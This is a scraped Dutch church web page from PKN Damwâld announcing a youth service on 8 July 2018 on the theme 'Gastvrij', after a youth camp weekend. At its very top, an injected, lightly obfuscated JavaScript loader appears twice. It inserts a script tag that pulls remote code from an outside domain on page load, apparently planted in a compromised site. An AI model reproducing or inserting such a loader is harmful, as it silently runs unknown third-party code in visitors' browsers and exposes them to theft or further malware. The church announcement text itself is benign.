;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jeugddienst 8 juli ... gastvrij ! - PKN Damwâld

Jeugddienst 8 juli … gastvrij !

Gepubliceerd op: donderdag 5 juli 2018

Zoals wellicht bekend is er elk jaar voor alle jeugd die een heel seizoen lang deelnemen aan de Snuffelkring, Live Steady of Youth@home weer het roemruchte kampweekend!  Een lekker lang weekend vol met sport, spel, geloof, muziek, overdenking, gezelligheid, mooie gesprekken, lekker eten en gekkigheid. Ook dit jaar was het kampweekend weer een groot succes !!!

Op 8 juli om 14.00 uur ben je welkom bij een speciale jeugddienst in De Ontmoeting aan de Foarwei 48 in Damwâld! Wiebe Feddema zal naar aanleiding van de belevenissen van het onlangs gehouden kampweekend ingaan op het thema ‘Gastvrij’.  Niet alleen een fijne terugblik naar dat kampweekend, maar bovendien ook met een ‘verdieping’ in het verlengde van de viering van het Heilig Avondmaal dat we ’s morgens met z’n allen hopen te vieren. Je bent welkom !